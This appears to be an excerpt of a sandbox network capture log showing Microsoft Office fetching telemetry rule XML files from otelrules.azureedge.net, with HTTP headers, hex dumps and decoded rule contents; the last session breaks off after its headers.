                                                                                                                                                                                                                                              2024-11-02 06:16:06 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              61192.168.2.46377813.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:06 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:06 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:06 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 407
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582B9D30478D"
                                                                                                                                                                                                                                              x-ms-request-id: dd9de73b-201e-00aa-8011-2c3928000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061606Z-176bd8f9bc5pqws8hC1DFW15kc000000019000000000du13
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:06 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              62192.168.2.46377913.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:06 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:06 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:06 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 474
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BB3F48DAE"
                                                                                                                                                                                                                                              x-ms-request-id: a77738ad-c01e-0066-3708-2ca1ec000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061606Z-16ccfc49897b872mhC1DFWqtb000000001q00000000061nw
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:06 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              63192.168.2.46378013.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:06 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:06 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:06 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 408
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BB9B6040B"
                                                                                                                                                                                                                                              x-ms-request-id: 489be2eb-a01e-0070-7b32-2c573b000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061606Z-176bd8f9bc59kq6hhC1DFWrs8000000001tg000000001mzt
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:06 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              64192.168.2.46378113.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:06 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:07 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:06 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 469
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BB3CAEBB8"
                                                                                                                                                                                                                                              x-ms-request-id: 39dce960-f01e-0085-6108-2c88ea000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061606Z-16ccfc498979lfwnhC1DFW56w800000001x00000000003fr
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:07 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              65192.168.2.46378213.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:07 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:07 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:07 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 416
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BB5284CCE"
                                                                                                                                                                                                                                              x-ms-request-id: 4e409c6c-b01e-003d-22c3-2bd32c000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061607Z-16ccfc498979nn5nhC1DFWk16800000001r000000000fhtt
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:07 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              66192.168.2.46378313.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:07 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:07 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:07 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 472
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582B91EAD002"
                                                                                                                                                                                                                                              x-ms-request-id: fd45401a-201e-005d-6808-2cafb3000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061607Z-16ccfc49897ht4f6hC1DFWwe7g00000001gg000000009q0a
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:07 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              67192.168.2.46378413.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:07 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:07 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:07 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 432
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BAABA2A10"
                                                                                                                                                                                                                                              x-ms-request-id: 7134e14c-501e-0078-0508-2c06cf000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061607Z-16ccfc49897wlhjjhC1DFWsx6c00000001r0000000003zmu
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:07 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              68192.168.2.46378513.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:07 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:07 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:07 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 475
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BBA740822"
                                                                                                                                                                                                                                              x-ms-request-id: 5d06de89-b01e-0084-7008-2cd736000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061607Z-16ccfc49897hrp7xhC1DFW7ud400000001n000000000bven
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:07 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              69192.168.2.46378613.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:07 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:07 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:07 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 427
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BB464F255"
                                                                                                                                                                                                                                              x-ms-request-id: 44d502e9-701e-000d-5c08-2c6de3000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061607Z-16dc884887bj94q5hC1DFW11e400000001g000000000b9yg
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
